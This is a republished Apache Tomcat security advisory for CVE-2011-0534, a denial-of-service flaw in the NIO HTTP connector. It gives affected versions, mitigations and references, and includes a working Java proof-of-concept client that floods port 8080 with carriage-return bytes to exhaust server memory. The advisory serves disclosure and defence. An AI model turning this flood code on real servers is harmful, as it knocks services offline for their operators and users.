[SECURITY] CVE-2011-0534 Apache Tomcat DoS vulnerability

2011-02-08T00:00:00
ID SECURITYVULNS:DOC:25623
Type securityvulns
Reporter Securityvulns
Modified 2011-02-08T00:00:00

Description

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

CVE-2011-0534 Apache Tomcat DoS vulnerability

Severity: Important

Vendor: The Apache Software Foundation

Versions Affected: - - Tomcat 7.0.0 to 7.0.6 - - Tomcat 6.0.0 to 6.0.30

Description: Tomcat did not enforce the maxHttpHeaderSize limit while parsing the request line in the NIO HTTP connector. A specially crafted request could trigger an DoS via an OutOfMemoryError.

Example (AL2 licensed): package bug50631;

import java.io.OutputStream; import java.net.InetSocketAddress; import java.net.Socket; import java.net.SocketAddress;

public class FloodClient1 { static final int k_step = 10; static byte[] value = new byte[k_step * 1024];

public static void main(String[] args) throws Exception {
    int i = 0;
    while (i < value.length) {
        value[i++] = 13;
    }
    SocketAddress addr = new InetSocketAddress("localhost", 8080);
    Socket socket = new Socket();
    socket.setSoTimeout(0);
    socket.connect(addr, 0);
    OutputStream os = socket.getOutputStream();
    // InputStream is = socket.getInputStream();

    int k = k_step;
    int m = 0;
    int k100 = 100;
    while (m < 2000) {
        if (k >= k100) {
            k100 += 100;
            System.out.print('.');
            System.out.flush();
        }
        if (k >= 1024) {
            m++;
            k -= 1024;
            k100 = 100;
            System.out.println(" " + m + " Mb");
        }
        os.write(value);
        os.flush();
        Thread.sleep(1);
        k+=k_step;
    }
}

}

Mitigation: Users of affected versions should apply one of the following mitigations - - Upgrade to a Tomcat version where this issue is fixed - - Use a BIO or AJP HTTP connector in place of an NIO HTTP connector

Credit: The issue was identified by the Tomcat security team.

References: https://issues.apache.org/bugzilla/show_bug.cgi?id=50631 http://tomcat.apache.org/security.html http://tomcat.apache.org/security-7.html http://tomcat.apache.org/security-6.html -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iQIcBAEBAgAGBQJNTLBxAAoJEBDAHFovYFnnVFsQAIE5bU+2aJccXjnlYkEZAr4S aXmHOCqTOzaW5ob3hPhpFmOwZx3Miabx9fJPRGnCb8CEihz00soYbMcTRHbgDqXA d/bXMr4xjZF80AM/cWng0vmDbgnLbhVUkGwNqLtuU2rjyxfnRNKBkc0CDIoDQ1FV zkm5uW9DYTpCmcRo13IhCPanY1DRA/+QiUxriofeUPuz6skiUuyBiY95GDQNOvSo GofEJt39DBnPDb2kzonkQTERo2OgSIPDgLeas3/pawHGsQXaBH3dwOsRQESExJS+ kT5xuhUuqynWNGXnimG0x8yCDe7+SujiAmSjTSrblBIanOtIt3SxjSe9+SasSQih jNO/M87aQ/znmlIlVeS4F+OFuWSuBUB+GjpZn1L77pG+/yWiHurhUuAXM2borB9c I45c2yuYstki7ej9buHXpy5l4d6A28FT61V6E2sENM9RMMHFY7cUJmorbsBf1qj2 ei+h9QEcNiwg/on0apg9pU+B1PCZxGR7G/8aMCXFfkri4opeAXy7ZpJfk+k2zI64 S8edezROjZxgztqZKydpFn2MrQ9tUmoioZHUEiZqAuPVfszXvUdLZsSFh+7A6+4D jL+T7jIt9wsCxsZJ1+8X03nEkD7Yop+kHvUmMjyM4XEKLReI+PoXfYBrNou7Nhvm niulExg4qtuJplCbEw8k =06CU -----END PGP SIGNATURE-----